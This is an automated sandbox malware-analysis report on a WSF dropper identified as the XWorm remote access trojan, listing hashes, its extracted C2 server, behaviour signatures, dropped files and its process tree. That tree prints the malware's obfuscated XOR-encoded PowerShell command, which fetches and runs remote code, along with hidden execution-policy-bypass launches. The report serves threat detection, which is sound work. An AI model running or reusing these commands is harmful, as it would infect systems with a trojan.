Overview

overview

10

Static

static

1

2e63fec516...d7.wsf

windows7-x64

8

2e63fec516...d7.wsf

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-09-2024 07:59

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2e63fec5163d85af2caf87e31459a0d6cca4cdb3d65a797e00a62b0c2b76acd7.wsf

  • Size

    3KB

  • MD5

    e4895b941c8ea6d76630d6fcb2002292

  • SHA1

    9e3038c82fd6767bfa224f361400fc89cd8d0d89

  • SHA256

    2e63fec5163d85af2caf87e31459a0d6cca4cdb3d65a797e00a62b0c2b76acd7

  • SHA512

    22c79a4fec72693f34933c1845c2225ba33cc9c11dd320a819e1c397dfa2ecc92ad752302fe161f247fd217cc30ec28a2959126a24a95269191dbe1fc473ea76

Score
10/10
xwormdiscoveryexecutionrattrojan

Malware Config

Extracted

Family

xworm

Version

5.0

C2

ALBANIAH3CKER.WORK.GD:7000

Mutex

IFhL8Is8edtDA6ZA

Attributes
  • install_file

    USB.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2e63fec5163d85af2caf87e31459a0d6cca4cdb3d65a797e00a62b0c2b76acd7.wsf"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4356
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$ReDrO = InvOkE-eXpreSSion ( ( [char[]] (62 , 72,39,61 ,83 , 127,66,50,84 , 127 , 61 , 33 , 62, 72, 95, 58, 39, 58 , 62 ,72 ,49 , 61,77 , 55, 85, 88,80, 61, 33 , 62, 72 ,95 ,94, 58, 39,58 ,62, 72, 95,49, 61 , 127 ,89,78 , 58 ,84,127,78,52 , 77 , 61, 33, 62,74 ,91 , 89 , 39 ,61, 127 , 88 , 89 ,86, 61, 33,62 ,98,98, 58 ,39 ,58, 62, 74, 91 , 89 , 49, 61, 83, 127,84, 61,33, 62,72,85,58, 39 ,58 , 62 ,98 , 98 ,49,61,78,51 , 52, 94 ,85 ,77 ,84, 86 , 85,61,33, 62, 96 , 96, 39 , 61 ,85, 90,42 , 50 ,60 ,50 ,61 ,61 , 114,110 , 110 , 106, 105,32, 53, 53 , 106,123 ,105, 110 , 127,52,127,127, 53, 104, 53,40, 92,94,96,126, 53, 42, 61, 61,51 , 61 , 52,72, 127 ,74,86 , 91, 89 , 127 ,50,61,85 ,90,42, 50, 60, 61 ,54 , 61, 91 ,94, 73,78 , 72, 83 ,84 ,93,61,51, 33 ,115 ,127,98 , 50,62,72 ,95, 94 , 49 , 62,72 , 85 , 49, 62 ,96 , 96 , 51 ) | %{[char] ( $_-BXOR '0x1a' ) } )-JOIN'') ; powershell $ReDrO"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:5080
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "MSFT_ScheduledTask (TaskName = "MicroSoftVisualsUpdater", TaskPath = "\")"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:884
  • C:\Windows\System32\WScript.exe
    C:\Windows\System32\WScript.exe "C:\ProgramData\Music\Visuals\VsLabs.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4160
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Music\Visuals\VsEnhance.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1948
      • C:\Windows\system32\cmd.exe
        cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4152
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:3496
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            5⤵
              PID:1228
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:3864

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\Music\Visuals\VsEnhance.bat
      Filesize

      144B

      MD5

      c3f2ca9b3ea3da4f346900dffdb028c1

      SHA1

      b0f2b20b6789958fa42e41949ace44875358cdd1

      SHA256

      fe4ed5dc25a2f658d48413b7c3badea8ad3d82885b5d59192833071a67f58ec4

      SHA512

      9abb200cef06ac9428930d31f84976dbec8abb5f0411906d60030dac503f967136c9f4410ca0bfc158d940799db95162071e3088cb581fcd625e9f509fbef1a5

      Download Submit

    • C:\ProgramData\Music\Visuals\VsLabs.vbs
      Filesize

      171B

      MD5

      3f6de49cf708411dd235d9021dba2b90

      SHA1

      ce36ca1a36a7e52351a34223f8f4dac3182a5dfb

      SHA256

      0a94db5411a2faa6c82ba90aeba60f7c018a80c77f2adf3fc1f0982890dcc712

      SHA512

      2a28b411a5bb322a7a18b94947255ee7f78bc62de401c602edf849d10914696d4883867b9336c3207d8bb4117af047542e721eb23030d1b1c2e64ae72d27f938

      Download Submit

    • C:\ProgramData\Music\Visuals\VsLabsData.ps1
      Filesize

      322KB

      MD5

      79c7de88735b9a87dab92655c9db6545

      SHA1

      7403b4a443928ec7c23b6a58813238499c0d3d9c

      SHA256

      31d12e107f0e8036747f8f18b2338d2c198a073969c670de9a0ba0c404ddb262

      SHA512

      f221838ff3d8c3cb461ec48306f8d2f29b57ab6d9c545d2496bbec5e9c8572fb14832a4e55a7da539cb1493b9abf5bbba3319d1ba43f46f44475db7f78a8b836

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      2KB

      MD5

      d85ba6ff808d9e5444a4b369f5bc2730

      SHA1

      31aa9d96590fff6981b315e0b391b575e4c0804a

      SHA256

      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

      SHA512

      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      0852e2b7bd53fb090adb03259c416445

      SHA1

      1c01331b9f64e68efb50f84eff0d13ef4a52d40a

      SHA256

      b9c78d7d80ee57dd43359b5e4117db02cb658ac5914784271c9d167aa18febb0

      SHA512

      87ddbfe16cadea51f8742da577b6370a21b7c0007599f14905b89d6c140fd556fcf7ce0e30624f7895b200c9d39c87bd0a2785b76486cef1aa75ceac44da32d6

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vz3c0xgc.pf0.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • memory/3496-50-0x000001B1763B0000-0x000001B1763CA000-memory.dmp

      Filesize

      104KB

      Download

    • memory/3864-56-0x0000000006B50000-0x00000000070F4000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/3864-55-0x0000000006500000-0x0000000006592000-memory.dmp

      Filesize

      584KB

      Download

    • memory/3864-54-0x00000000059D0000-0x0000000005A36000-memory.dmp

      Filesize

      408KB

      Download

    • memory/3864-53-0x0000000005320000-0x00000000053BC000-memory.dmp

      Filesize

      624KB

      Download

    • memory/3864-51-0x0000000000400000-0x000000000040E000-memory.dmp

      Filesize

      56KB

      Download

    • memory/5080-13-0x00007FFD1F220000-0x00007FFD1FCE1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/5080-36-0x00007FFD1F220000-0x00007FFD1FCE1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/5080-30-0x00007FFD1F220000-0x00007FFD1FCE1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/5080-20-0x00007FFD1F220000-0x00007FFD1FCE1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/5080-19-0x00007FFD1F220000-0x00007FFD1FCE1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/5080-18-0x00007FFD1F223000-0x00007FFD1F225000-memory.dmp

      Filesize

      8KB

      Download

    • memory/5080-17-0x000001E1FA270000-0x000001E1FA432000-memory.dmp

      Filesize

      1.8MB

      Download

    • memory/5080-0-0x00007FFD1F223000-0x00007FFD1F225000-memory.dmp

      Filesize

      8KB

      Download

    • memory/5080-12-0x00007FFD1F220000-0x00007FFD1FCE1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/5080-11-0x00007FFD1F220000-0x00007FFD1FCE1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/5080-10-0x000001E1F9CC0000-0x000001E1F9CE2000-memory.dmp

      Filesize

      136KB

      Download